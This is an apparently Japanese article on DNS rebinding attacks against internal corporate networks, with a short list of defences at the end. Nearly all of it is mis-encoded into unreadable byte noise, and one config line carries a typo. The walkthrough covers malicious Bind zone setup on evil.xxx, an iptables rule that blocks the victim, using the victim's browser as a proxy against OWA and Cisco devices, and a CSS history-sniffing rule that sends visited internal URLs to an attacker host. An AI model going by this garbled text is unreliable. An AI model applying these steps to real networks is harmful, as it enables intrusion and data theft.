
ãã€ãã¹å¶é
ä»ã®ãã¡ã€ã³ããã®ããŒã¿åä¿¡ã®å¶éã解é€ã§ããå Žåãæ£ç¢ºã«äœãéæã§ããããèããŸãã ãŸãããµãŒãããŒãã£ã®ãªãœãŒã¹ã«ãªã¯ãšã¹ããéä¿¡ã§ããã ãã§ãªãïŒæšæºã®CSRFæ»æãšåæ§ïŒããµãŒããŒããåä¿¡ããå¿çãåŠçããããšãã§ããŸãã ããã¯ãCSRFæ»æããä¿è·ããããã«èšèšãããã¡ã«ããºã ã®ã»ãšãã©ãæ©èœããªããªãããšãæå³ããŸãã ãŠãŒã¶ãŒã®ãã©ãŠã¶ããããã·ãšããŠäœ¿çšããªãããå éšãããã¯ãŒã¯ã«ãããªãœãŒã¹ïŒå€éšããã¯ã¢ã¯ã»ã¹ã§ããªãïŒã«ã¢ã¯ã»ã¹ã§ããŸãã 蚌ææžã䜿çšããŠãŠãŒã¶ãŒãèªèšŒããããªãœãŒã¹ããæ©å¯ããŒã¿ãååŸããããšãå¯èœã§ãã äŒæ¥ç°å¢åãã®ãã®ãããªWebã¢ããªã±ãŒã·ã§ã³ã®è¯ãäŸã¯ãOutlook Web Accessã¡ãŒã«ãµãŒããŒã§ãã
DNSãªãã€ã³ããšãåŒã°ããã¢ã³ãDNSãã³ãã³ã°æ»æãã¡ããªãèæ¡ãããã®ã¯ããåãèµ·æºããªã·ãŒãã®å¶éãåé¿ããããã§ããã ä»»æã®HostããããŒå€ã§HTTPèŠæ±ã«å¿çããWebãµãŒããŒã¯ãã¢ã³ãDNSãã³ãã³ã°æ»æãåãããããªããŸãã ç¹ã«ãããã©ã«ãæ§æã®ãã¹ãŠã®Apacheããã³IIS WebãµãŒããŒã¯è匱ã§ãã HTTPã«ãã£ãŠå¶åŸ¡ãããã»ãšãã©ãã¹ãŠã®ãªã¢ãŒããµãŒãã¹ã¯ãWebã€ã³ã¿ãŒãã§ã€ã¹ããªããŠãè匱ã§ãã ããšãã°ãSOAPãXML-RPCãªã©ã«ãã£ãŠå¶åŸ¡ããããªã¢ãŒãAPIãæäŸããã»ãšãã©ãã¹ãŠã®ãµãŒãã¹ã¯è匱ã§ãã

DNSãªãã€ã³ãã«ããæ»æ
ãã€ã³ãã¯äœã§ããïŒ
ææ°ã®ãã©ãŠã¶ã¯ãä»»æã®ãµã€ãããããŒãžãåä¿¡ãããšãDNSã¯ãšãªã®çµæããã£ãã·ã¥ããŸãã ããã¯ãIPã¢ãã¬ã¹ãã¹ããŒãã£ã³ã°ããããšã«ããããªã¯ãšã¹ãããµãŒãããŒãã£ã®ãµãŒããŒã«éä¿¡ãããªãããã«ããããã§ãã ãã®ã¡ã«ããºã ãåé¿ããããã«äœãã§ããããèããŠã¿ãŸãããã 以åã¯ãïŒçè«äžïŒæ»æã¯æ¬¡ã®ããã«å®è¡ã§ããŸããã
- 被害è ã¯æ»æè ã®ãã¡ã€ã³ã«ã¢ã¯ã»ã¹ããŸãã
- DNSãµãŒããŒãããã¡ã€ã³åã«å¯Ÿå¿ããIPã¢ãã¬ã¹ãååŸããŸãã
- WebãµãŒããŒïŒåä¿¡ããIPã«å¯Ÿå¿ïŒã«ã¢ã¯ã»ã¹ããããããjavascriptã¹ã¯ãªãããåä¿¡ããŸãã
- ããŒãããµãŒããŒãžã®ç¹°ãè¿ãèŠæ±ãéå§ããŠãããã°ããããŠJavascriptãåä¿¡ããŸããã
- ãã®æç¹ã§ããã¡ã€ã¢ãŠã©ãŒã«ã䜿çšããæ»æè ã¯ã被害è ãããµãŒããŒãžã®ãã¹ãŠã®ãªã¯ãšã¹ãããããã¯ããŸãã
- ãã©ãŠã¶ã¯ïŒé©åãªDNSã¯ãšãªãéä¿¡ããããšã«ããïŒãµãŒããŒã®IPã¢ãã¬ã¹ãååŸããããšããŸãããä»åã¯è¢«å®³è ã®ããŒã«ã«ãããã¯ãŒã¯ããè匱ãªãµãŒããŒã®IPã¢ãã¬ã¹ãåãåããŸãã
ãããã£ãŠã被害è ãevil.xxxãã¡ã€ã³ã«èªã蟌ãããšãã§ããå Žåããã®ãã¡ã€ã³åã¯å€éšã€ã³ã¿ãŒãããããã®IPã¢ãã¬ã¹ã§ã¯ãªããããŒã«ã«ãããã¯ãŒã¯ããã®IPã¢ãã¬ã¹ã«å¯Ÿå¿ããŠãããšãŠãŒã¶ãŒã®ãã©ãŠã¶ã«æãããããšãã§ããŸãã ããšãã°ããã®ã¢ãã¬ã¹ã§ã¯ãéèŠãªå éšäŒæ¥ãªãœãŒã¹ãèŠã€ããããšãã§ããŸãã å¯äžã®åé¡ã¯ããã®ããŒãžã§ã³ã®æ»æãæ©èœããªãããšã§ãã
å®è·µãã
æ»æã®èª¬æãããããããã«ã1å°ã®ãµãŒããŒãå¿ èŠã§ãããã®ãµãŒããŒäžã§ãWEBãµãŒããŒãšDNSãµãŒããŒãäœæããã³æ§æããå¿ èŠããããŸãããŸãã被害è ãèªå°ã§ãããã¡ã€ã³ãå¿ èŠã§ãã ãã¡ã€ã³åãç»é²ãããšãããµãŒããŒã®ããŒã¿ãNSãµãŒããŒãšããŠç€ºããŸãã
å®éã«æ»æãæåãããã«ã¯ãäž¡æ¹ã®IPã¢ãã¬ã¹ãåæã«è¿ãããã«NSãµãŒããŒãæ§æããå¿ èŠããããŸãã ããã«ãJavascriptãæ»æãè¡ã£ãŠãããµãŒããŒã®IPã¢ãã¬ã¹ãæåã«è¿ããã被害è ã®ãµãŒããŒã®IPã¢ãã¬ã¹ã2çªç®ã«è¿ãããå¿ èŠããããŸãã ãã®å Žåããã©ãŠã¶ã¯ãã¡ã€ã³ã«ã¢ã¯ã»ã¹ãããšãã«ãŸãæ»æã¹ã¯ãªããããµãŒããŒããããŠã³ããŒãããŸãããã®åŸããµãŒããŒãå©çšã§ããªããªã£ãå ŽåïŒãã¡ã€ã¢ãŠã©ãŒã«ã«ãããªã¯ãšã¹ãã®ãããã¯ã®çµæïŒã被害è ã®ãµãŒããŒã«æ¥ç¶ããŸãã
ãã®ç®çã«ã¯ãBind 9ãµãŒããŒãéåžžã«é©ããŠããŸãããIPã¢ãã¬ã¹ãç®çã®é åºã§è¿ãã«ã¯ããã©ã°--enable-fixed-rrsetã䜿çšããŠãœãŒã¹ã³ãŒãããçµã¿ç«ãŠãå¿ èŠããããŸãã ããã©ã«ãã§ã¯ããã®ãã©ã°ã¯èšå®ãããŠãããããã€ããªã§é åžãããŠããããŒãžã§ã³ã¯äœ¿çšã§ããŸããã bind9èšå®ã¯ãIPã¢ãã¬ã¹ã®åºå®é åºã䜿çšããå¿ èŠãããããšã瀺ããŠããŸãã ãããè¡ãã«ã¯ãnamed.conf.optionsã§ãoptionsãã©ã¡ãŒã¿ãŒã§ä»¥äžãæå®ããŸãã
rrset-oredr { order fixed; };
次ã«ããŸãŒã³ãæ§æããå¿ èŠããããŸãã ããšãã°ãdns.evil.xxxãã¡ã€ã³ïŒ
dns A 97.246.251.93
A 192.168.0.1
ãã®çµæãæ»æè ã®DNSãµãŒããŒã«ã¢ã¯ã»ã¹ããéãdns.attacker.ruãã¡ã€ã³ã®å Žåããã©ãŠã¶ãŒã¯åžžã«IPã¢ãã¬ã¹97.246.251.93ã«æåã«ã¢ã¯ã»ã¹ãã次ã«IPã¢ãã¬ã¹ãå©çšã§ããªãå Žåã¯192.168.0.1ã«ã¢ã¯ã»ã¹ããŸãã å Žåã«ãã£ãŠã¯ããã®é åºã«éåããå¯èœæ§ããããŸãã詳现ã«ã€ããŠã¯ã以äžã§èª¬æããŸãã
DNSãµãŒããŒã«å ããŠãæ»æã«ã¯WebãµãŒããŒïŒäŸãšããŠApacheãèæ ®ïŒãšããµãŒããŒã«æ¥ç¶ããããã®çä¿¡èŠæ±ããããã¯ãã䟿å©ãªã¡ã«ããºã ãå¿ èŠã§ãã iptablesãã¡ã€ã¢ãŠã©ãŒã«ã䜿çšããŠãçä¿¡èŠæ±ããããã¯ã§ããŸãããããã¯ããæãå¹æçãªæ¹æ³ã¯ãæ¥ç¶ã®è©Šè¡ã«å¿çããŠtcp-resetã§ãã±ãããéä¿¡ããããšã§ããããããªããšããã©ãŠã¶ãŒã¯ãµãŒããŒããã®å¿çãåŸ ã€TCPã»ãã·ã§ã³ã¿ã€ã ã¢ãŠãã®äžéšãšããŠäœåãªæéãè²»ãããŸã iptablesã䜿çšãããšãããã¯æ¬¡ã®ããã«è¡ãããŸãã
iptables -A INPUT -s [ IP-] -p tcp --dport 80 -j REJECT --reject-with tcp-reset

iptablesã䜿çšããŠãŠãŒã¶ãŒããããã¯ããŸã
ãã®äŸã§ã¯ã80çªç®ã®ããŒãã®ã¿ãæå³çã«ãããã¯ãããŠããŸããæ»æãå®è£ ããã«ã¯ãã¯ã©ã€ã¢ã³ãããåä¿¡ããããŒã¿ãéä¿¡ããããµãŒãã¹ãå¿ èŠã ããã§ãã ãã®çµæãæ»æã¯æ¬¡ã®ããã«ãªããŸãã
- 被害è ã¯dns.evil.xxxãã¡ã€ã³ã«ã¢ã¯ã»ã¹ããŸãã
- æ»æè ã®DNSãµãŒããŒã¯ãåºå®ãããé åºã§äž¡æ¹ã®IPã¢ãã¬ã¹ãè¿ããŸãã
- ãã©ãŠã¶ã¯ãå€éšIP 97.246.251.93ã«ãããµãŒããŒã«ãªã¯ãšã¹ãããªãã€ã¬ã¯ãããŸãã
- ãµãŒããŒã¯JavaScriptãå«ãHTMLããŒãžãè¿ããŸãã
- ãã©ãŠã¶ã«ããŒãžãããŒãããåŸãã¯ã©ã€ã¢ã³ãjavascriptã¯dns.evil.xxxãã¡ã€ã³ã«ãªã¯ãšã¹ããéä¿¡ããŸãã
- ãµãŒããŒåŽã®ã¹ã¯ãªããã¯ããªã¯ãšã¹ããåä¿¡ããåŸã被害è ã®IPã¢ãã¬ã¹ããã®çä¿¡æ¥ç¶ããããã¯ããŸãã
- ãã°ãããããšãã¯ã©ã€ã¢ã³ãã¹ã¯ãªããã¯åã³dns.attacker.ruãã¡ã€ã³ã«ã¢ã¯ã»ã¹ãããµãŒããŒ97.246.251.93ãRSTãè¿ããããèŠæ±ã¯ããŒã«ã«ãµãŒããŒ192.168.0.1ã«ãªãã€ã¬ã¯ããããŸãã
ãã€ããŒã
ãã®ããããã©ãŠã¶ã¯ã¹ã¯ãªãããå éšãããã¯ãŒã¯ãããªãœãŒã¹ããããŠã³ããŒãããããšå€æãããã®ãªãœãŒã¹ã管çããããšãã§ããŸãã ãã®ã¹ã¯ãªããã¯ãå®éã®äœ¿çšã®ããã«ã©ã®ãããªã¿ã¹ã¯ãå®è¡ããå¿ èŠããããŸããïŒ æåã«ãã¹ã¯ãªããã¯ãåŠçããŠããç¹å®ã®ã¢ããªã±ãŒã·ã§ã³ãå€æããå¿ èŠãããã次ã«ããã€ãã¹ããå¿ èŠãããæ¿èªããããã©ãããå€æããå¿ èŠããããŸãã ãã®åŸãã¹ã¯ãªããã¯ããã®ã¿ã€ãã®æ©åšçšã«çµã¿èŸŒãŸããã³ãã³ããå®è¡ããå¿ èŠããããŸãã ããšãã°ãæ§æãå€æŽããããè匱ãªãµãŒããŒã«ä¿åãããŠããã¬ã¿ãŒ/ããã¥ã¡ã³ãã®ã³ããŒãååŸããŸãã ããŒãã³ãŒããããã³ãã³ããå®è¡ããåŸã被害è ã®ãã©ãŠã¶ããããã·ã¢ãŒãã«åãæ¿ããŠãæ»æè ããªã³ã©ã€ã³ã§ã¢ããªã±ãŒã·ã§ã³ã«ãªã¯ãšã¹ããéä¿¡ã§ããããã«ããããšãã§ããŸãã
ãããã®ãã¹ãŠã®ã¿ã¹ã¯ãå®äºããåã«ãã¹ã¯ãªãããè匱ãªã¢ããªã±ãŒã·ã§ã³ã«ãªã¯ãšã¹ããéä¿¡ããæ¹æ³ãããã³åä¿¡ããããŒã¿ãæ»æè ã®ãµãŒããŒã«è»¢éãããæ¹æ³ãç解ããå¿ èŠããããŸãã Same Origin Policyã®å¶éãæ¢ã«åé¿ããŠããããšãå¿ããªãã§ãã ãããã€ãŸããæšæºã®AJAXãã¯ãããžãŒãç¹ã«XMLHttpRequestã³ã³ããŒãã³ãã䜿çšããŠãè匱ãªãµãŒããŒãšéä¿¡ããããšãã§ããŸãã
æ»æããã»ã¹å¶åŸ¡ãµãŒããŒïŒæ»æè ã®ç®¡çããã«ïŒã¯å¥ã®ãã¡ã€ã³ãŸãã¯å¥ã®ããŒãïŒãµãŒããŒã®80çªç®ã®ããŒãããããã¯ããïŒã«ãããããåä¿¡ããããŒã¿ããµãŒããŒã«è»¢éããããšã¯ããå°é£ã§ãã ããã¯ãã¹ã¯ãªãããåã³åäžçæå ããªã·ãŒã®å¶éã«çŽé¢ããããšãæå³ããŸãã 幞ããªããšã«ããã®åé¡ã解決ããããã«ãJSONPãšåŒã°ããæè¡ãçºæãããŸãããJSONPã䜿çšãããšãç¹å¥ã«æºåãããåçãè¿ãããå Žåã«ãµãŒããŒã«ãªã¯ãšã¹ããéä¿¡ã§ããŸãïŒJSONPã®è©³çŽ°ã«ã€ããŠã¯ãWebããã°ã©ãã³ã°å°çšã®ãªãœãŒã¹ãåç §ããŠãã ããïŒã ã¡ã«ããºã ã䜿çšãããšããã¹ãŠãæ確ã«ãªããŸãã

åºæ¬èªèšŒãŠã£ã³ããŠ

OWAã¢ããªã±ãŒã·ã§ã³ã§ã®æ¿èªããã»ã¹
ã³ãã³ãå®è¡
æ»æããããµãŒããŒã«ã³ãã³ããéä¿¡ãããšãã¯ãXMLHttpRequestãåæã¢ãŒãã§äœ¿çšããããã³ãã³ãã®éä¿¡ãæåã§åæããåã®ã³ãã³ããžã®åçãå°çãããŸã§æ¬¡ã®ã³ãã³ããéä¿¡ããªãã§ãã ããã ã¹ã¯ãªããã®ããã©ãŒãã³ã¹ãæ¹åããã«ã¯ã2çªç®ã®ãªãã·ã§ã³ã䜿çšããããšããå§ãããŸãã
被害è ã®ãã©ãŠã¶ããããã·ãšããŠäœ¿çšããã«ã¯ãã¹ã¯ãªããã®å®è¡ãå®äºããåŸã«setIntervalé¢æ°ãå®è¡ããå¿ èŠããããŸãããã®é¢æ°ã«ã¯ãæ»æãåããŠããæ©åšã§å®è¡ããå¿ èŠãããå¶åŸ¡ãµãŒããŒãã次ã®ã³ãã³ããèŠæ±ããã³ãŒããæž¡ããŸã ãããŠãã³ãã³ãã®çµæããµãŒããŒã«éãè¿ãããšãã§ããŸãã

ã·ã¹ã³æ©åšããèšå®ãååŸãã

Outlook Web Accessã«å¯Ÿããæ»æã®çµæ
äŒæ¥ãããã¯ãŒã¯ãžã®æ»æ
ç®æšã1ã€ã®å Žåã®å¯ŸåŠæ¹æ³ãèŠã€ããŸããã 次ã«ãäŒæ¥ãããã¯ãŒã¯å šäœãæ»æããæ¹æ³ãææ¡ããå¿ èŠããããŸãã ãŸãããŸã第äžã«ããã®ãããªæ»æãè¡ãããã«ã¯ã容èªã§ããæéå ã«æ»æ察象ã®IPã¢ãã¬ã¹ã決å®ããæ¹æ³ãåŠã¶å¿ èŠããããŸãã 次ã«ãåäžã®ãŠãŒã¶ãŒã»ãã·ã§ã³ã§è€æ°ã®ã¿ãŒã²ãããæ»æããæ©èœãæäŸããå¿ èŠããããŸãã 第äžã«ãäŒæ¥ã®å éšãããã¯ãŒã¯ã«ããè€æ°ã®ãã©ãŠã¶ããåããµãŒããŒã«åæ£æ»æãå®è¡ããæ©èœãå¿ èŠã§ãã ãããŠç¬¬4ã«ã被害è ã®ãã©ãŠã¶ããããã·ãšããŠäœ¿çšãããšãã«ãããŸããŸãªIPã¢ãã¬ã¹ã«ãªã¯ãšã¹ããéä¿¡ããæ©èœãå¿ èŠã§ãïŒäžèšã®èª¬æã¯ããã®ãããªã³ãã³ãã1ã€ã®ã¢ãã¬ã¹ã«ã®ã¿éä¿¡ããããšã«ã€ããŠã§ããïŒã
ã¿ãŒã²ããæå®
ç®æšã決å®ããããã«ãç¯å²ããšã«ãããã¯ãŒã¯IPã¢ãã¬ã¹ãã¹ãã£ã³ã§ããŸãã ãã®ããã«ãããšãã°ãIFRAMEã¿ã°ãšonLoadã€ãã³ãã䜿çšã§ããŸãã å¥ã®å®è£ ãªãã·ã§ã³ã¯ãImageãªããžã§ã¯ããäœæããonLoadã䜿çšããŠç»åãããŒãããããã©ãããå€æããããšã§ãã ç¹å®ã®ã¢ãã¬ã¹ã§ãªãœãŒã¹ãèŠã€ãããªãã£ãããšã確èªããã«ã¯ãsetTimeouté¢æ°ã䜿çšããŸãããã°ãããããšããªããžã§ã¯ããäœæããããã©ããã確èªãããªããžã§ã¯ããäœæãããªãã£ãå Žåã¯ããã®ã¢ãã¬ã¹ã®ãªãœãŒã¹ãèŠã€ãããªãã£ãããšãéç¥ããŸãã
ãã®ã¢ãããŒãã®äœ¿çšã«ã¯ãããã€ãã®æãããªåé¡ã䌎ããŸãã
- ãããã·ãµãŒããŒã¯ãååšããªãIPã¢ãã¬ã¹ã«èŠæ±ãéä¿¡ããå Žåã§ãå¿çãè¿ãããšãã§ããŸãããã®çµæãonLoadã¡ãœããã¯ååšããªãã¢ãã¬ã¹ã®ååšã瀺ããŸãã
- ã¿ã€ã ã¢ãŠãå€ã®éžæãšã©ãŒã®å Žåãæœåšçã«å€æ°ã®èª€æ€ç¥ã
- 倧ããªã¿ã€ã ã¢ãŠãå€ããã³/ãŸãã¯æ€çŽ¢ãããã¢ãã¬ã¹ã®ç¯å²ãåºãå Žåãéžæã«ã¯ããªãã®æéãããããŸãã
CSS History Hack v 2.0
æ°å¹Žåããã©ãŠã¶ãŠãŒã¶ãŒãã¢ã¯ã»ã¹ããWebã¢ãã¬ã¹ãç¹å®ããèå³æ·±ãæ¹æ³ãææ¡ãããŸããã ã¡ãœããã®æ¬è³ªã¯ãjavascriptã䜿çšãããšãããŒãžäžã«äœæããããªã³ã¯ã®è²ãèŠã€ããããšãã§ãã以åã«ã¢ã¯ã»ã¹ãããªã³ã¯ã§ã¯ãã®è²ãç°ãªãããšã§ãã
ãããã£ãŠãã¢ãã¬ã¹ã®ãªã¹ããäœæããããjavascriptã䜿çšããŠãªã¹ãããåã¢ãã¬ã¹ã®ã¿ã°ãäœæãããã®è²ãæ¢ã«ã¢ã¯ã»ã¹ãããªã³ã¯ã®è²ãšæ¯èŒã§ããŸãã æäœãç°¡åã«ããããã«ãæ¢ã«ã¢ã¯ã»ã¹ãããªã³ã¯ã®è²ã¯CSSã䜿çšããŠæ瀺çã«èšå®ãããŸãã
æ°å¹Žãçµéãããã®è匱æ§ã¯éããããŸããã ãã©ãŠã¶ã®ææ°ããŒãžã§ã³ïŒIE8ãå«ãïŒã¯ããªã³ã¯ã以åã«ã¢ã¯ã»ã¹ãããå Žåã§ããåžžã«ããã°ã©ã ã§ãªã³ã¯ã®ããã©ã«ãã®è²ãæäŸããŸãã ãã ãããã®è匱æ§ã¯æ°ããæ¹æ³ã§å®è£ ã§ããŸãã ãããè¡ãã«ã¯ããã§ãã¯ããããªã³ã¯ã®é åãå³å¯ã«èšå®ããŸãã次ã«äŸã瀺ããŸãã
var links = [
'http://192.168.0.1',
'http://192.168.1.1',
'http://10.1.1.1'
];
åçã«äœæãããSTYLEã¿ã°ã®åãªã³ã¯ã«å¯ŸããŠã次ã®åœ¢åŒã®CSSã«ãŒã«ãè¿œå ããŸãã
A#id:visited { background:url('http://admin.evil.xxx:8080/backonnect.php?url=http://192.168.0.1'); }
ãã®çµæãã¢ã¯ã»ã¹ãããªã³ã¯ãäœæãããšãã«ããã©ãŠã¶ãŒã¯ã¢ãã¬ã¹ã§æå®ãããURLãããŒãããããšããŸãããæªèšªåã®ãªã³ã¯ã®å ŽåãURLã¯ããŒããããŸããã ãããã£ãŠã蚪åãããªã³ã¯ã«é¢ããæ å ±ããµãŒããŒã«éä¿¡ããããšãã§ããææ°ããŒãžã§ã³ãå«ããã©ãŠã¶ãŒã®çŸåšã®ããŒãžã§ã³ã¯ãã¹ãŠããã®ã¿ã€ãã®æ»æãåãããããªããŸãã
è€æ°ã®ã¿ãŒã²ãããæ»æãã
DNSåãã€ã³ãã¿ã€ãã®æ»æãå®è¡ããã«ã¯ããŠãŒã¶ãŒåŽã®æ¥ç¶ããããã¯ããå¿ èŠããããææ°ã®ãã©ãŠã¶ãŒã®åå¿ãèæ ®ããŠããã®ãããã¯ã¯TCPãã³ãã·ã§ã€ã¯äžã§ãå®è¡ããå¿ èŠããããŸãã æ¥ç¶åŸã«ããã¯ãå®è¡ãããå Žåããã©ãŠã¶ã¯ä»£æ¿ã¢ãã¬ã¹ã䜿çšããŸããã ç¹ã«ãIEãšFirefoxã¯ç©ºã®å¿çæ¬æã§200 OKå¿çãè¿ããOperaãã©ãŠã¶ã¯404ãšã©ãŒã³ãŒããè¿ããå¥ã®IPã¢ãã¬ã¹ãžã®æ¥ç¶ãè©Šã¿ãŸããã ãããã£ãŠãæšæºçãªã¢ãããŒãã䜿çšããŠè€æ°ã®ãªãœãŒã¹ãåæã«æ»æããããšã¯äžå¯èœã§ãã
è€æ°ã®ã¿ãŒã²ããã«å¯ŸããŠæ»æãè¡ãã«ã¯ãç®æšãå®çŸ©ããå¥ã®HTMLããŒãžã§çŸåšã®ã¿ãŒã²ãããéžæããæ©èœã匷調衚瀺ã§ããŸãã ã¿ãŒã²ãããæ€åºããããšããã®IPã¢ãã¬ã¹ããµãŒããŒã«éä¿¡ããããµãŒããŒã¹ã¯ãªããã¯ãããæ»æããããã«DNSããŒãã«ã«å¯Ÿå¿ãããµããã¡ã€ã³ãäœæããå¿ èŠããããŸãã ããšãã°ãIPã¢ãã¬ã¹192.168.0.1ã®å Žåã192.168.0.1.dns.evil.xxxã®ãµããã¡ã€ã³ãäœæã§ããŸãã dns.evil.xxx/control.htmlã®å¶åŸ¡ããŒãžã¯ãDNS Rebindingæ»æãå®è¡ããããã®ã¯ã©ã€ã¢ã³ãã¹ã¯ãªãããå«ãããã¥ã¡ã³ããããŒããããiframeãäœæããå¿ èŠããããŸããããšãã°ã 192.168.0.1.dns.evil.xxx / rebindingã«ãããŸãã html
æ»æäžã«ä»®æ³ãµã€ããè¿œå ããªãããã«ããã«ã¯ããã¹ãŠã®ãµããã¡ã€ã³ã«å¯ŸããŠåããã¡ã€ã«ãè¿ãããããã«ãWebãµãŒããŒã®ä»®æ³ãã¹ããæ§æããå¿ èŠããããŸãã ããã¯ãã©ããã¯ã¹ãäœæããŸãïŒæ»æãå®è¡ãããµãŒããŒèªäœã¯ããã«å¯ŸããŠè匱ã§ã:)ã
çµæã®ããŒãžã¯ããµãŒããŒã«èŠæ±ã®ã¿ãåŠçããããã«æ瀺ããæ»æè ã®IPã¢ãã¬ã¹ããããã¯ããããã«èŠæ±ããäœæ¥ãè¡ããããã¯ã解é€ããŸãã ããã«å ããŠããµãŒããŒã¯åã³è¢«å®³è ããã®ãªã¯ãšã¹ãã解決ããŸãã
å®å šãªã¢ã«ãŽãªãºã ã¯æ¬¡ã®ãšããã§ãã
- ã¿ãŒã²ãã決å®ã·ã¹ãã ã¯ãã¿ãŒã²ããIPã¢ãã¬ã¹ãæ»æè ã®ãµãŒããŒïŒããšãã°ã97.246.251.93ïŒã«éä¿¡ããŸãã
- ã¯ã©ã€ã¢ã³ãã®å¶åŸ¡ã¹ã¯ãªããã¯ããµãŒããŒã«ã¿ãŒã²ããã®ãã¡ã€ã³åãèŠæ±ããŸãã
- ãµãŒããŒã¯ãç¹å®ã®IPã¢ãã¬ã¹ãæ»æããããã«äœ¿çšããããµããã¡ã€ã³ã®DNSã¬ã³ãŒããäœæããŸãã
äŸïŒ
97.246.251.93.dns.evil.xxx A 97.246.251.93
A 192.168.0.1
- å¶åŸ¡ã¹ã¯ãªããã¯ãåä¿¡ãããã¡ã€ã³åãsrc IFRAMEã¿ã°ã®ãã©ã¡ãŒã¿ãŒãšããŠç€ºããŸãã
- ãã¡ã€ã³192.168.0.1.evil.xxxããåä¿¡ããããã¥ã¡ã³ãã¯ããµãŒããŒã«ããã¯ãèŠæ±ããŸãã
- ãµãŒããŒã¯ã¿ãŒã²ããã¢ãã¬ã¹ã®ãªã¯ãšã¹ããžã®å¿çãåæ¢ãã被害è ã®ãã©ãŠã¶ããããŒã80ãžã®ã¢ã¯ã»ã¹ããããã¯ããŸãã
- ã¯ã©ã€ã¢ã³ãã¹ã¯ãªããã¯ãé©åãªããŒã¿ã®ååŸãšæ©åšã®ç®¡çãè¡ããŸãã
- ã¯ã©ã€ã¢ã³ãã¹ã¯ãªãããçµäºãããšãããã¯ã解é€ã§ããããšããµãŒããŒã«éç¥ããŸãã
- ãµãŒããŒã¯ããã¯ã解é€ããåã³ããŒã80ãæ»æããã¢ãã¬ã¹ããã®ã¢ã¯ã»ã¹ãèš±å¯ããŸãã
- å¶åŸ¡ã¹ã¯ãªããã¯æ¬¡ã®ã¿ãŒã²ããã®ã¢ãã¬ã¹ãèŠæ±ããå¿ èŠã«å¿ããŠããã»ã¹ãç¹°ãè¿ãããŸãã

åçãªãµããã¡ã€ã³ã®äœæ
DNSã¬ã³ãŒããåçã«äœæããã«ã¯ãnsupdateãŠãŒãã£ãªãã£ãªã©ã®èªåDNSæŽæ°ã¡ã«ããºã ã䜿çšã§ããŸãã 䜿çšããå ŽåãDNSãµãŒããŒãåèµ·åããå¿ èŠã¯ãããŸããã
DNS Rebindingæ»æä¿è·
åºæ¬çã«ããã®ã¿ã€ãã®æ»æãã身ãå®ãæ¹æ³ã¯ããã€ããããŸãã
- ãµãŒããŒãœãããŠã§ã¢ã®æ£ããæ§æã å€ã_default_ãŸãã¯*ïŒ80ã§ããWebãµãŒããŒã®VirtualHostãã©ã¡ãŒã¿ãŒãåé€ãããã¹ãåãæ瀺çã«ç»é²ããŸãã
- Webã¢ããªã±ãŒã·ã§ã³éçºè ã«ããä¿è·ã ã¢ããªã±ãŒã·ã§ã³ãã€ã³ã¹ããŒã«ãããšãã«ãã¢ããªã±ãŒã·ã§ã³ãé 眮ããããµãŒããŒã®ãã¡ã€ã³åãå ¥åããHTTPèŠæ±ã®Hostãã©ã¡ãŒã¿ãŒãã€ã³ã¹ããŒã«äžã«æå®ããããã¡ã€ã³åãšäžèŽããå Žåã«ã®ã¿ã¯ã©ã€ã¢ã³ãããã®èŠæ±ãåŠçãããããŠãŒã¶ãŒã«ä¿ããŸãã
- ãã©ãŠã¶ã§ã¯ãNOSCRIPTãã©ã°ã€ã³ãŸãã¯é¡äŒŒç©ã䜿çšããJavaScriptã¹ã¯ãªãããJavaã¢ãã¬ããããŸãã¯Flashã¢ããªã±ãŒã·ã§ã³ã®å®è¡ãçŠæ¢ããŸãã
- ãŸãŒã³åé¢ã䜿çšããŸãããŸãŒã³åé¢ã§ã¯ãå€éšã€ã³ã¿ãŒãããããåä¿¡ããã¹ã¯ãªããã¯ããŠãŒã¶ãŒã®ããŒã«ã«ãããã¯ãŒã¯ã«ãããªãœãŒã¹ãžã®ã¢ã¯ã»ã¹ãæ瀺çã«çŠæ¢ãããŸãã

ããã«ãŒãã¬ãžã³ã 8æïŒ08ïŒ151
ããã¹ã»ãã©ãã
Positive Hack Daysã«åºã¥ããŸãã
ããã«ãŒã賌èªãã